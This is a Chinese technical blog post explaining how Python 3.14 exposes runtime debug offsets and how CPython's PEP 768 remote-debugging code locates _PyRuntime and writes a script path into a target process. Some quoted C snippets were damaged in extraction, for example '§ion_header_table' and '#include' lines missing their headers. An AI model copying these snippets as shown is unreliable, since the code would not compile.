Manjusaka

Python 3.14: Python 世界的一大步

2025-04-26T14:49:00.000Z

Python 3.14 目前主要的一些主要的特性其实已经固定了，在我看来，Python 3.14 是一个未来很多年的一个核心版本。因为其确定了是时代的 Python
调试生态的基准，这篇文章将会来聊聊这个 Python 世界中的史诗级改进

正文

在我们日常调试 Python 代码的时候，我们经常会遇到这样一个问题，我们需要采样当前的 Python Runtime 的状态，进而进一步调试我们的 Python 进程

常见的手段莫过于两种

通过 eBPF + UProbe 等手段来触发
通过 process_vm_readv 等 Syscall 来直接整块读取内存

无论这两种方式都有一个核心的问题，我们怎么样来解析内存中的数据？

用 https://github.com/jschwinger233/perf-examples/blob/main/cpython310_backtrace/bpf.c 来做一个例子，在之前的很多年的时候，我们会怎么做

#define PAGE_SIZE (1<<12)
#define KASAN_STACK_ORDER 0
#define THREAD_SIZE_ORDER (2 + KASAN_STACK_ORDER)
#define THREAD_SIZE  ((__u64)(PAGE_SIZE << THREAD_SIZE_ORDER))
#define TOP_OF_KERNEL_STACK_PADDING ((__u64)0)

const static u32 ZERO = 0;

struct PyTypeObject {
    char _[24];
    char *tp_name;
};

struct PyObject {
    char _[8];
    struct PyTypeObject *ob_type;
};

struct PyVarObject {
    struct PyObject ob_base;
    char _[8];
};

struct PyASCIIObject {
__u8 _[16];
__u64 length;
__u8 __[24];
};

struct _PyStr {
    struct PyASCIIObject ascii;
    char buf[100];
};

struct PyCodeObject {
    char _[104];
    struct _PyStr *co_filename;
    struct _PyStr *co_name;
};

struct PyFrameObject {
    struct PyVarObject ob_base;
    struct PyFrameObject *f_back;
    struct PyCodeObject *f_code;
    char _[60];
    int f_lineno;
};

struct event {
__u64 rip;
__u8 user_mode;
__s8 python_stack_depth;
__u64 filename_len[20];
__u64 funcname_len[20];
unsigned char filename[20][100];
unsigned char funcname[20][100];
};

struct {
__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
__uint(max_entries, 1);
__type(key, u32);
__type(value, struct event);
} events SEC(".maps");

struct {
__uint(type, BPF_MAP_TYPE_RINGBUF);
__uint(max_entries, 1<<29);
} ringbuf SEC(".maps");

SEC("perf_event/cpython310")
int perf_event_cpython310(struct bpf_perf_event_data *ctx)
{
__u64 rsp;
struct event *event;
struct PyFrameObject *frame;

event = bpf_map_lookup_elem(&events, &ZERO);
if (!event)
return 0;

rsp = ctx->regs.sp;
event->rip = ctx->regs.ip;
event->user_mode = !!(ctx->regs.cs & 3);

if (!event->user_mode) {
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
__u64 __ptr = (__u64)BPF_CORE_READ(task, stack);
__ptr += THREAD_SIZE - TOP_OF_KERNEL_STACK_PADDING;
struct pt_regs *pt_regs = ((struct pt_regs *)__ptr) - 1;

rsp = BPF_CORE_READ(pt_regs, sp);
event->rip = BPF_CORE_READ(pt_regs, ip);
}

char name[5];
bool found = false;

for (int i = 0; i < 200; i++) {
bpf_probe_read_user(&frame, sizeof(frame), (void *)rsp + 8*i);
if (!frame)
continue;

char *tp_name = BPF_PROBE_READ_USER(frame, ob_base.ob_base.ob_type, tp_name);
bpf_probe_read_user(&name, sizeof(name), (void *)tp_name);
if (bpf_strncmp(name, 5, "frame") == 0) {
found = true;
break;
}
}

if (!found) {
event->python_stack_depth = -1;
bpf_ringbuf_output(&ringbuf, event, sizeof(*event), 0);
return 0;
}

for (int i = 0; i < 20; i++) {
event->python_stack_depth = i;
BPF_PROBE_READ_USER_INTO(&event->filename_len[i], frame, f_code, co_filename, ascii.length);
BPF_PROBE_READ_USER_INTO(&event->filename[i], frame, f_code, co_filename, buf);
BPF_PROBE_READ_USER_INTO(&event->funcname_len[i], frame, f_code, co_name, ascii.length);
BPF_PROBE_READ_USER_INTO(&event->funcname[i], frame, f_code, co_name, buf);
frame = BPF_PROBE_READ_USER(frame, f_back);
if (!frame)
break;
}

bpf_ringbuf_output(&ringbuf, event, sizeof(*event), 0);
return 0;
}

char __license[] SEC("license") = "Dual MIT/GPL";

上面的核心代码其实没多少，核心的逻辑就还是我们手动模拟 Python 中关键的 PyFrameObject 结构体，然后我们在内存中不断做一次搜索，暴力匹配到特征一致的内存

其余诸如 PySpy 这样的工具也是类似的思路

这个方式最核心的问题是在于说，Python 每个版本的 ABI 都可能发生变化，所以我们需要不断的根据不同的版本去做兼容（比如 PySpy 维护了从3.7到3.12的不同的 PyFrameObject。

那么我们有没有更好的方法来处理这个问题？或者说我们能不能更好的去定位？

可以的，写 Python 的同学肯定都知道我们 Python 中有一个全局的变量 _PyRuntime，其类型为 pyruntimestate，大致的布局如下

struct pyruntimestate {

    _Py_DebugOffsets debug_offsets;

    int _initialized;

    int preinitializing;

    int preinitialized;

    int core_initialized;

    int initialized;

    PyThreadState *_finalizing;

    unsigned long _finalizing_id;

    struct pyinterpreters {
        PyMutex mutex;
        PyInterpreterState *head;

        PyInterpreterState *main;

        int64_t next_id;
    } interpreters;


    unsigned long main_thread;
    PyThreadState *main_tstate;


    _PyXI_global_state_t xi;

    struct _pymem_allocators allocators;
    struct _obmalloc_global_state obmalloc;
    struct pyhash_runtime_state pyhash_state;
    struct _pythread_runtime_state threads;
    struct _signals_runtime_state signals;

    Py_tss_t autoTSSkey;

    Py_tss_t trashTSSkey;

    PyWideStringList orig_argv;

    struct _parser_runtime_state parser;

    struct _atexit_runtime_state atexit;

    struct _import_runtime_state imports;
    struct _ceval_runtime_state ceval;
    struct _gilstate_runtime_state {

        int check_enabled;

        PyInterpreterState *autoInterpreterState;
    } gilstate;
    struct _getargs_runtime_state {
        struct _PyArg_Parser *static_parsers;
    } getargs;
    struct _fileutils_state fileutils;
    struct _faulthandler_runtime_state faulthandler;
    struct _tracemalloc_runtime_state tracemalloc;
    struct _reftracer_runtime_state ref_tracer;

    _PyRWMutex stoptheworld_mutex;
    struct _stoptheworld_state stoptheworld;

    PyPreConfig preconfig;
    Py_OpenCodeHookFunction open_code_hook;
    void *open_code_userdata;
    struct {
        PyMutex mutex;
        struct _Py_AuditHookEntry *head;
    } audit_hooks;

    struct _py_object_runtime_state object_state;
    struct _Py_float_runtime_state float_state;
    struct _Py_unicode_runtime_state unicode_state;
    struct _types_runtime_state types;
    struct _Py_time_runtime_state time;

#if defined(__EMSCRIPTEN__) && defined(PY_CALL_TRAMPOLINE)

    int (*emscripten_count_args_function)(PyCFunctionWithKeywords func);
#endif
    struct _Py_cached_objects cached_objects;
    struct _Py_static_objects static_objects;

    PyInterpreterState _main_interpreter;

};

眼尖的同学肯定看到了，我们其中有一段核心的代码

struct pyinterpreters {
    PyMutex mutex;
    PyInterpreterState *head;

    PyInterpreterState *main;

    int64_t next_id;
} interpreters;

维护了一个 PyInterpreterState 的链表，我们可以通过 PyInterpreterState 来获取当前的 Frame，PyInterpreterState 中的 TreadState 来获取当前的线程状态

struct pythreads {
    uint64_t next_unique_id;
    /* The linked list of threads, newest first. */
    PyThreadState *head;
    _PyThreadStateImpl *preallocated;
    /* The thread currently executing in the __main__ module, if any. */
    PyThreadState *main;
    /* Used in Modules/_threadmodule.c. */
    Py_ssize_t count;
    /* Support for runtime thread stack size tuning.
       A value of 0 means using the platform's default stack size
       or the size specified by the THREAD_STACK_SIZE macro. */
    /* Used in Python/thread.c. */
    size_t stacksize;
} threads;

而 PyThreadState 中和核心的 struct _PyInterpreterFrame *current_frame 就是我们需要的 frame state，整个流程大概如下

graph TD    PyRuntime["_PyRuntime (pyruntimestate)"] --> Interpreters["interpreters (pyinterpreters)"]    Interpreters -->|head| InterpreterStateHead["PyInterpreterState *head"]    Interpreters -->|main| InterpreterStateMain["PyInterpreterState *main"]        %% Define interpreter state structure    subgraph PyInterpreterState        InterpreterID["int64_t id"]         ThreadsStruct["struct pythreads threads"]        NextInterpreter["PyInterpreterState *next"]    end        InterpreterStateHead --- PyInterpreterState    InterpreterStateMain --- PyInterpreterState        %% Link to threads structure    ThreadsStruct --> ThreadHead["PyThreadState *head"]    ThreadsStruct --> ThreadMain["PyThreadState *main"]        %% Define thread state structure    subgraph PyThreadState        ThreadID["uint64_t thread_id"]        InterpreterPtr["PyInterpreterState *interp"]        CurrentFrame["_PyInterpreterFrame *current_frame"]        NextThread["PyThreadState *next"]    end        ThreadHead --- PyThreadState    ThreadMain --- PyThreadState        %% Frame structure    CurrentFrame --> Frame["_PyInterpreterFrame structure"]        subgraph _PyInterpreterFrame        PreviousFrame["_PyInterpreterFrame *previous"]        CodeObject["PyCodeObject *f_code"]        Locals["PyObject **localsplus"]    end        %% Connected paths in color    PyRuntime ==>|"Main Path"| Interpreters    Interpreters ==>|"Main Path"| InterpreterStateMain    InterpreterStateMain ==>|"Main Path"| ThreadsStruct    ThreadsStruct ==>|"Main Path"| ThreadMain    ThreadMain ==>|"Main Path"| CurrentFrame    CurrentFrame ==>|"Main Path"| Frame        class PyRuntime,InterpreterStateMain,ThreadMain,CurrentFrame,Frame mainPath;    classDef mainPath fill:#f96,stroke:#333,stroke-width:2px;    classDef mainNodes fill:#f9f,stroke:#333,stroke-width:2px;

那么我们现在来解决第一个问题，我们怎么样获取在内存中的 _PyRuntime 的地址呢？

我们把这个问题抽象成下面最简单一个 C 代码

#include 

int abc=3;

int main() {
    printf("abc: %p\n", &abc);
    return 0;
}

我们怎么样获取 abc 的地址呢？这里写过 C 的同学可能反应过来了，我们可以使用 __attribute__((section())) 的语法，来将其放到一个特定的段中

#include 

int abc __attribute__((section(".my_section"))) = 3;

int main() {
    printf("abc: %p\n", &abc);
    return 0;
}

我们编译，并用 readelf 来解析一下二进制

1 2	╰─ readelf -S ./a.out\| grep my_section [25] .my_section PROGBITS 0000000000004018 00003018

我们能看到这里我们得到了一个相对地址。后续我们就可以通过解析 ELF 来遍历寻找到 abc 变量的地址

那么在 Python 中同样如此，在代码中有这样一段代码

#define GENERATE_DEBUG_SECTION(name, declaration)     \
   _GENERATE_DEBUG_SECTION_WINDOWS(name)            \
   _GENERATE_DEBUG_SECTION_APPLE(name)              \
   declaration                                      \
   _GENERATE_DEBUG_SECTION_LINUX(name)

// Please note that section names are truncated to eight bytes
// on Windows!
#if defined(MS_WINDOWS)
#define _GENERATE_DEBUG_SECTION_WINDOWS(name)                       \
   _Pragma(Py_STRINGIFY(section(Py_STRINGIFY(name), read, write))) \
   __declspec(allocate(Py_STRINGIFY(name)))
#else
#define _GENERATE_DEBUG_SECTION_WINDOWS(name)
#endif

#if defined(__APPLE__)
#define _GENERATE_DEBUG_SECTION_APPLE(name) \
   __attribute__((section(SEG_DATA "," Py_STRINGIFY(name))))      \
   __attribute__((used))
#else
#define _GENERATE_DEBUG_SECTION_APPLE(name)
#endif

#if defined(__linux__) && (defined(__GNUC__) || defined(__clang__))
#define _GENERATE_DEBUG_SECTION_LINUX(name) \
   __attribute__((section("." Py_STRINGIFY(name))))               \
   __attribute__((used))
#else
#define _GENERATE_DEBUG_SECTION_LINUX(name)
#endif

GENERATE_DEBUG_SECTION(PyRuntime, _PyRuntimeState _PyRuntime)
= _PyRuntimeState_INIT(_PyRuntime, _Py_Debug_Cookie);
_Py_COMP_DIAG_POP

这样我们就能比较方便的获取到 PyRuntime 在内存中的地址。

那么现在第二个问题是，我们怎么样通过我们前面介绍的调用链获取到地址？

大家可能第一反应还是想通过维护不同版本的数据结构来获取具体的地址。不过这里我们有没有办法可以用更简单的方法来处理呢？答案是有的

眼尖的同学可能看到了我们在 pyruntimestate 中有一个字段叫 debug_offsets，我们来看下我们怎么初始化这个字段的吧

#define _Py_DebugOffsets_INIT(debug_cookie) { \
    .cookie = debug_cookie, \
    .version = PY_VERSION_HEX, \
    .free_threaded = _Py_Debug_Free_Threaded, \
    .runtime_state = { \
        .size = sizeof(_PyRuntimeState), \
        .finalizing = offsetof(_PyRuntimeState, _finalizing), \
        .interpreters_head = offsetof(_PyRuntimeState, interpreters.head), \
    }, \
    .interpreter_state = { \
        .size = sizeof(PyInterpreterState), \
        .id = offsetof(PyInterpreterState, id), \
        .next = offsetof(PyInterpreterState, next), \
        .threads_head = offsetof(PyInterpreterState, threads.head), \
        .threads_main = offsetof(PyInterpreterState, threads.main), \
        .gc = offsetof(PyInterpreterState, gc), \
        .imports_modules = offsetof(PyInterpreterState, imports.modules), \
        .sysdict = offsetof(PyInterpreterState, sysdict), \
        .builtins = offsetof(PyInterpreterState, builtins), \
        .ceval_gil = offsetof(PyInterpreterState, ceval.gil), \
        .gil_runtime_state = offsetof(PyInterpreterState, _gil), \
        .gil_runtime_state_enabled = _Py_Debug_gilruntimestate_enabled, \
        .gil_runtime_state_locked = offsetof(PyInterpreterState, _gil.locked), \
        .gil_runtime_state_holder = offsetof(PyInterpreterState, _gil.last_holder), \
    }, \
    .thread_state = { \
        .size = sizeof(PyThreadState), \
        .prev = offsetof(PyThreadState, prev), \
        .next = offsetof(PyThreadState, next), \
        .interp = offsetof(PyThreadState, interp), \
        .current_frame = offsetof(PyThreadState, current_frame), \
        .thread_id = offsetof(PyThreadState, thread_id), \
        .native_thread_id = offsetof(PyThreadState, native_thread_id), \
        .datastack_chunk = offsetof(PyThreadState, datastack_chunk), \
        .status = offsetof(PyThreadState, _status), \
    }, \
    .interpreter_frame = { \
        .size = sizeof(_PyInterpreterFrame), \
        .previous = offsetof(_PyInterpreterFrame, previous), \
        .executable = offsetof(_PyInterpreterFrame, f_executable), \
        .instr_ptr = offsetof(_PyInterpreterFrame, instr_ptr), \
        .localsplus = offsetof(_PyInterpreterFrame, localsplus), \
        .owner = offsetof(_PyInterpreterFrame, owner), \
        .stackpointer = offsetof(_PyInterpreterFrame, stackpointer), \
    }, \
    .code_object = { \
        .size = sizeof(PyCodeObject), \
        .filename = offsetof(PyCodeObject, co_filename), \
        .name = offsetof(PyCodeObject, co_name), \
        .qualname = offsetof(PyCodeObject, co_qualname), \
        .linetable = offsetof(PyCodeObject, co_linetable), \
        .firstlineno = offsetof(PyCodeObject, co_firstlineno), \
        .argcount = offsetof(PyCodeObject, co_argcount), \
        .localsplusnames = offsetof(PyCodeObject, co_localsplusnames), \
        .localspluskinds = offsetof(PyCodeObject, co_localspluskinds), \
        .co_code_adaptive = offsetof(PyCodeObject, co_code_adaptive), \
    }, \
    .pyobject = { \
        .size = sizeof(PyObject), \
        .ob_type = offsetof(PyObject, ob_type), \
    }, \
    .type_object = { \
        .size = sizeof(PyTypeObject), \
        .tp_name = offsetof(PyTypeObject, tp_name), \
        .tp_repr = offsetof(PyTypeObject, tp_repr), \
        .tp_flags = offsetof(PyTypeObject, tp_flags), \
    }, \
    .tuple_object = { \
        .size = sizeof(PyTupleObject), \
        .ob_item = offsetof(PyTupleObject, ob_item), \
        .ob_size = offsetof(PyTupleObject, ob_base.ob_size), \
    }, \
    .list_object = { \
        .size = sizeof(PyListObject), \
        .ob_item = offsetof(PyListObject, ob_item), \
        .ob_size = offsetof(PyListObject, ob_base.ob_size), \
    }, \
    .set_object = { \
        .size = sizeof(PySetObject), \
        .used = offsetof(PySetObject, used), \
        .table = offsetof(PySetObject, table), \
        .mask = offsetof(PySetObject, mask), \
    }, \
    .dict_object = { \
        .size = sizeof(PyDictObject), \
        .ma_keys = offsetof(PyDictObject, ma_keys), \
        .ma_values = offsetof(PyDictObject, ma_values), \
    }, \
    .float_object = { \
        .size = sizeof(PyFloatObject), \
        .ob_fval = offsetof(PyFloatObject, ob_fval), \
    }, \
    .long_object = { \
        .size = sizeof(PyLongObject), \
        .lv_tag = offsetof(PyLongObject, long_value.lv_tag), \
        .ob_digit = offsetof(PyLongObject, long_value.ob_digit), \
    }, \
    .bytes_object = { \
        .size = sizeof(PyBytesObject), \
        .ob_size = offsetof(PyBytesObject, ob_base.ob_size), \
        .ob_sval = offsetof(PyBytesObject, ob_sval), \
    }, \
    .unicode_object = { \
        .size = sizeof(PyUnicodeObject), \
        .state = offsetof(PyUnicodeObject, _base._base.state), \
        .length = offsetof(PyUnicodeObject, _base._base.length), \
        .asciiobject_size = sizeof(PyASCIIObject), \
    }, \
    .gc = { \
        .size = sizeof(struct _gc_runtime_state), \
        .collecting = offsetof(struct _gc_runtime_state, collecting), \
    }, \
    .gen_object = { \
        .size = sizeof(PyGenObject), \
        .gi_name = offsetof(PyGenObject, gi_name), \
        .gi_iframe = offsetof(PyGenObject, gi_iframe), \
        .gi_frame_state = offsetof(PyGenObject, gi_frame_state), \
    }, \
    .debugger_support = { \
        .eval_breaker = offsetof(PyThreadState, eval_breaker), \
        .remote_debugger_support = offsetof(PyThreadState, remote_debugger_support),  \
        .remote_debugging_enabled = offsetof(PyInterpreterState, config.remote_debug),  \
        .debugger_pending_call = offsetof(_PyRemoteDebuggerSupport, debugger_pending_call),  \
        .debugger_script_path = offsetof(_PyRemoteDebuggerSupport, debugger_script_path),  \
        .debugger_script_path_size = MAX_SCRIPT_PATH_SIZE, \
    }, \
}

我们能看到我们使用了 offsetof 这个非常经典的宏来将一下我们常用的字段相较于结构体的偏移写入到 debug_offsets 中去。而 debug_offsets 将固定存在于 pyruntimestate 的第一个字段，同时起改变频率相对较低，所以我们就可以通过 debugger_support 获取不同地址的偏移量来获取最终我们想要的数据。

通过这样的做法，我们实际上就有很多很好玩的事情可以做了。实际上官方也是基于这样一套机制提出了 PEP 768 – Safe external debugger interface for CPython https://peps.python.org/pep-0768/。可以允许用户远程的为一个 Python 进程注入一段调试代码

我们来看一下这个 PEP 的核心实现

在前面介绍过的 ThreadState 中新增了一组结构

typedef struct _remote_debugger_support {
    int32_t debugger_pending_call;
    char debugger_script_path[MAX_SCRIPT_PATH_SIZE];
} _PyRemoteDebuggerSupport;

在执行过程中，如果 debugger_pending_call 为 1 的时候，我们就会去执行 debugger_script_path 中的脚本

int _PyRunRemoteDebugger(PyThreadState *tstate)
{
    const PyConfig *config = _PyInterpreterState_GetConfig(tstate->interp);
    if (config->remote_debug == 1
         && tstate->remote_debugger_support.debugger_pending_call == 1)
    {
        tstate->remote_debugger_support.debugger_pending_call = 0;

        // Immediately make a copy in case of a race with another debugger
        // process that's trying to write to the buffer. At least this way
        // we'll be internally consistent: what we audit is what we run.
        const size_t pathsz
            = sizeof(tstate->remote_debugger_support.debugger_script_path);

        char *path = PyMem_Malloc(pathsz);
        if (path) {
            // And don't assume the debugger correctly null terminated it.
            memcpy(
                path,
                tstate->remote_debugger_support.debugger_script_path,
                pathsz);
            path[pathsz - 1] = '\0';
            if (*path) {
                run_remote_debugger_script(path);
            }
            PyMem_Free(path);
        }
    }
    return 0;
}

那么问题来了，我们现在怎么样给目标 Python 进程注入对应的值呢？我们来看看 remote_debugging.c 中的实现

首先入口函数为 _PySysRemoteDebug_SendExec

int
_PySysRemoteDebug_SendExec(int pid, int tid, const char *debugger_script_path)
{
#if !defined(Py_SUPPORTS_REMOTE_DEBUG)
    PyErr_SetString(PyExc_RuntimeError, "Remote debugging is not supported on this platform");
    return -1;
#elif !defined(Py_REMOTE_DEBUG)
    PyErr_SetString(PyExc_RuntimeError, "Remote debugging support has not been compiled in");
    return -1;
#else

    PyThreadState *tstate = _PyThreadState_GET();
    const PyConfig *config = _PyInterpreterState_GetConfig(tstate->interp);
    if (config->remote_debug != 1) {
        PyErr_SetString(PyExc_RuntimeError, "Remote debugging is not enabled");
        return -1;
    }

    proc_handle_t handle;
    if (init_proc_handle(&handle, pid) < 0) {
        return -1;
    }

    int rc = send_exec_to_proc_handle(&handle, tid, debugger_script_path);
    cleanup_proc_handle(&handle);
    return rc;
#endif
}

前面都是一些例行的检查，我们来看看 send_exec_to_proc_handle 这个函数

static int
send_exec_to_proc_handle(proc_handle_t *handle, int tid, const char *debugger_script_path)
{
    uintptr_t runtime_start_address;
    struct _Py_DebugOffsets debug_offsets;

    if (read_offsets(handle, &runtime_start_address, &debug_offsets)) {
        return -1;
    }

    uintptr_t interpreter_state_list_head = (uintptr_t)debug_offsets.runtime_state.interpreters_head;

    uintptr_t interpreter_state_addr;
    if (0 != read_memory(
            handle,
            runtime_start_address + interpreter_state_list_head,
            sizeof(void*),
            &interpreter_state_addr))
    {
        return -1;
    }

    if (interpreter_state_addr == 0) {
        PyErr_SetString(PyExc_RuntimeError, "Can't find a running interpreter in the remote process");
        return -1;
    }

    int is_remote_debugging_enabled = 0;
    if (0 != read_memory(
            handle,
            interpreter_state_addr + debug_offsets.debugger_support.remote_debugging_enabled,
            sizeof(int),
            &is_remote_debugging_enabled))
    {
        return -1;
    }

    if (is_remote_debugging_enabled != 1) {
        PyErr_SetString(
            PyExc_RuntimeError,
            "Remote debugging is not enabled in the remote process");
        return -1;
    }

    uintptr_t thread_state_addr;
    unsigned long this_tid = 0;

    if (tid != 0) {
        if (0 != read_memory(
                handle,
                interpreter_state_addr + debug_offsets.interpreter_state.threads_head,
                sizeof(void*),
                &thread_state_addr))
        {
            return -1;
        }
        while (thread_state_addr != 0) {
            if (0 != read_memory(
                    handle,
                    thread_state_addr + debug_offsets.thread_state.native_thread_id,
                    sizeof(this_tid),
                    &this_tid))
            {
                return -1;
            }

            if (this_tid == (unsigned long)tid) {
                break;
            }

            if (0 != read_memory(
                    handle,
                    thread_state_addr + debug_offsets.thread_state.next,
                    sizeof(void*),
                    &thread_state_addr))
            {
                return -1;
            }
        }

        if (thread_state_addr == 0) {
            PyErr_SetString(
                PyExc_RuntimeError,
                "Can't find the specified thread in the remote process");
            return -1;
        }
    } else {
        if (0 != read_memory(
                handle,
                interpreter_state_addr + debug_offsets.interpreter_state.threads_main,
                sizeof(void*),
                &thread_state_addr))
        {
            return -1;
        }

        if (thread_state_addr == 0) {
            PyErr_SetString(
                PyExc_RuntimeError,
                "Can't find the main thread in the remote process");
            return -1;
        }
    }

    // Ensure our path is not too long
    if (debug_offsets.debugger_support.debugger_script_path_size <= strlen(debugger_script_path)) {
        PyErr_SetString(PyExc_ValueError, "Debugger script path is too long");
        return -1;
    }

    uintptr_t debugger_script_path_addr = (uintptr_t)(
        thread_state_addr +
        debug_offsets.debugger_support.remote_debugger_support +
        debug_offsets.debugger_support.debugger_script_path);
    if (0 != write_memory(
            handle,
            debugger_script_path_addr,
            strlen(debugger_script_path) + 1,
            debugger_script_path))
    {
        return -1;
    }

    int pending_call = 1;
    uintptr_t debugger_pending_call_addr = (uintptr_t)(
        thread_state_addr +
        debug_offsets.debugger_support.remote_debugger_support +
        debug_offsets.debugger_support.debugger_pending_call);
    if (0 != write_memory(
            handle,
            debugger_pending_call_addr,
            sizeof(int),
            &pending_call))

    {
        return -1;
    }

    uintptr_t eval_breaker;
    if (0 != read_memory(
            handle,
            thread_state_addr + debug_offsets.debugger_support.eval_breaker,
            sizeof(uintptr_t),
            &eval_breaker))
    {
        return -1;
    }

    eval_breaker |= _PY_EVAL_PLEASE_STOP_BIT;

    if (0 != write_memory(
            handle,
            thread_state_addr + (uintptr_t)debug_offsets.debugger_support.eval_breaker,
            sizeof(uintptr_t),
            &eval_breaker))

    {
        return -1;
    }

    return 0;
}

我们先不考虑具体的细节的话，这段函数的逻辑还是非常明确的，通过 read_offsets 获取目标的地址偏移，通过 read_memory 这个函数读取不同地址，然后做一些处理后，通过 write_memory 来写入到目标进程中去

而 read_offsets 这个函数就是我们前面核心提到过的怎么样使用目前 Python 给出的调试信息的例子，我们来看一下其在 Linux 下的实现

static int
read_offsets(
    proc_handle_t *handle,
    uintptr_t *runtime_start_address,
    _Py_DebugOffsets* debug_offsets
) {
    if (_Py_RemoteDebug_ReadDebugOffsets(handle, runtime_start_address, debug_offsets)) {
        return -1;
    }
    if (ensure_debug_offset_compatibility(debug_offsets)) {
        return -1;
    }
    return 0;
}

这里的核心函数是 _Py_RemoteDebug_ReadDebugOffsets，我们接着来看这个的实现

static int
_Py_RemoteDebug_ReadDebugOffsets(
    proc_handle_t *handle,
    uintptr_t *runtime_start_address,
    _Py_DebugOffsets* debug_offsets
) {
    *runtime_start_address = _Py_RemoteDebug_GetPyRuntimeAddress(handle);
    if (!*runtime_start_address) {
        if (!PyErr_Occurred()) {
            PyErr_SetString(
                PyExc_RuntimeError, "Failed to get PyRuntime address");
        }
        return -1;
    }
    size_t size = sizeof(struct _Py_DebugOffsets);
    if (0 != _Py_RemoteDebug_ReadRemoteMemory(handle, *runtime_start_address, size, debug_offsets)) {
        return -1;
    }
    return 0;
}

我们注意到，这里的核心还是我们先要获取到 PyRuntime 的地址，那么我们来看看 _Py_RemoteDebug_GetPyRuntimeAddress 的实现

static uintptr_t
_Py_RemoteDebug_GetPyRuntimeAddress(proc_handle_t* handle)
{
    uintptr_t address;
    address = search_linux_map_for_section(handle, "PyRuntime", "python");
    if (address == 0) {
        // Error out: 'python' substring covers both executable and DLL
        PyErr_SetString(PyExc_RuntimeError, "Failed to find the PyRuntime section in the process.");
    }
    return address;
}

static uintptr_t
search_linux_map_for_section(proc_handle_t *handle, const char* secname, const char* substr)
{
    char maps_file_path[64];
    sprintf(maps_file_path, "/proc/%d/maps", handle->pid);

    FILE* maps_file = fopen(maps_file_path, "r");
    if (maps_file == NULL) {
        PyErr_SetFromErrno(PyExc_OSError);
        return 0;
    }

    size_t linelen = 0;
    size_t linesz = PATH_MAX;
    char *line = PyMem_Malloc(linesz);
    if (!line) {
        fclose(maps_file);
        PyErr_NoMemory();
        return 0;
    }

    uintptr_t retval = 0;
    while (fgets(line + linelen, linesz - linelen, maps_file) != NULL) {
        linelen = strlen(line);
        if (line[linelen - 1] != '\n') {
            // Read a partial line: realloc and keep reading where we left off.
            // Note that even the last line will be terminated by a newline.
            linesz *= 2;
            char *biggerline = PyMem_Realloc(line, linesz);
            if (!biggerline) {
                PyMem_Free(line);
                fclose(maps_file);
                PyErr_NoMemory();
                return 0;
            }
            line = biggerline;
            continue;
        }

        // Read a full line: strip the newline
        line[linelen - 1] = '\0';
        // and prepare to read the next line into the start of the buffer.
        linelen = 0;

        unsigned long start = 0;
        unsigned long path_pos = 0;
        sscanf(line, "%lx-%*x %*s %*s %*s %*s %ln", &start, &path_pos);

        if (!path_pos) {
            // Line didn't match our format string.  This shouldn't be
            // possible, but let's be defensive and skip the line.
            continue;
        }

        const char *path = line + path_pos;
        const char *filename = strrchr(path, '/');
        if (filename) {
            filename++;  // Move past the '/'
        } else {
            filename = path;  // No directories, or an empty string
        }

        if (strstr(filename, substr)) {
            retval = search_elf_file_for_section(handle, secname, start, path);
            if (retval) {
                break;
            }
        }
    }

    PyMem_Free(line);
    fclose(maps_file);

    return retval;
}

我们这里能看到 _Py_RemoteDebug_GetPyRuntimeAddress 调用了 search_linux_map_for_section 来获取当前的 PyRuntime 的地址，而 search_linux_map_for_section 则是通过 /proc/${pid}/maps ，暴力遍历 maps 中的内存段来获取具体的地址。

我们来看看 search_elf_file_for_section 的实现

search_elf_file_for_section(
        proc_handle_t *handle,
        const char* secname,
        uintptr_t start_address,
        const char *elf_file)
{
    if (start_address == 0) {
        return 0;
    }

    uintptr_t result = 0;
    void* file_memory = NULL;

    int fd = open(elf_file, O_RDONLY);
    if (fd < 0) {
        PyErr_SetFromErrno(PyExc_OSError);
        goto exit;
    }

    struct stat file_stats;
    if (fstat(fd, &file_stats) != 0) {
        PyErr_SetFromErrno(PyExc_OSError);
        goto exit;
    }

    file_memory = mmap(NULL, file_stats.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (file_memory == MAP_FAILED) {
        PyErr_SetFromErrno(PyExc_OSError);
        goto exit;
    }

    Elf_Ehdr* elf_header = (Elf_Ehdr*)file_memory;

    Elf_Shdr* section_header_table = (Elf_Shdr*)(file_memory + elf_header->e_shoff);

    Elf_Shdr* shstrtab_section = §ion_header_table[elf_header->e_shstrndx];
    char* shstrtab = (char*)(file_memory + shstrtab_section->sh_offset);

    Elf_Shdr* section = NULL;
    for (int i = 0; i < elf_header->e_shnum; i++) {
        char* this_sec_name = shstrtab + section_header_table[i].sh_name;
        // Move 1 character to account for the leading "."
        this_sec_name += 1;
        if (strcmp(secname, this_sec_name) == 0) {
            section = §ion_header_table[i];
            break;
        }
    }

    Elf_Phdr* program_header_table = (Elf_Phdr*)(file_memory + elf_header->e_phoff);
    // Find the first PT_LOAD segment
    Elf_Phdr* first_load_segment = NULL;
    for (int i = 0; i < elf_header->e_phnum; i++) {
        if (program_header_table[i].p_type == PT_LOAD) {
            first_load_segment = &program_header_table[i];
            break;
        }
    }

    if (section != NULL && first_load_segment != NULL) {
        uintptr_t elf_load_addr = first_load_segment->p_vaddr
            - (first_load_segment->p_vaddr % first_load_segment->p_align);
        result = start_address + (uintptr_t)section->sh_addr - elf_load_addr;
    }

exit:
    if (file_memory != NULL) {
        munmap(file_memory, file_stats.st_size);
    }
    if (fd >= 0 && close(fd) != 0) {
        PyErr_SetFromErrno(PyExc_OSError);
    }
    return result;
}

这段代码稍微有点复杂，我们来拆分看一下

首先函数的声明

search_elf_file_for_section(
        proc_handle_t *handle,
        const char* secname,
        uintptr_t start_address,
        const char *elf_file)

用于在ELF文件中搜索特定的section。参数包括：进程句柄、要查找的section名称、起始地址（文件在进程空间的映射位置）、ELF文件路径。

int fd = open(elf_file, O_RDONLY);
if (fd < 0) {
    PyErr_SetFromErrno(PyExc_OSError);
    goto exit;
}

以只读方式打开ELF文件，如果失败则设置Python异常并跳转到退出处理。

file_memory = mmap(NULL, file_stats.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
if (file_memory == MAP_FAILED) {
    PyErr_SetFromErrno(PyExc_OSError);
    goto exit;
}

将文件内容映射到内存，以只读和私有方式，从文件头开始。失败则设置异常并退出。

1 2	Elf_Ehdr* elf_header = (Elf_Ehdr)file_memory; Elf_Shdr section_header_table = (Elf_Shdr*)(file_memory + elf_header->e_shoff);

将文件开头 cast 为ELF文件头结构，并找到section header表的位置，它在文件偏移e_shoff处。

Elf_Shdr* shstrtab_section = §ion_header_table[elf_header->e_shstrndx];
char* shstrtab = (char*)(file_memory + shstrtab_section->sh_offset);
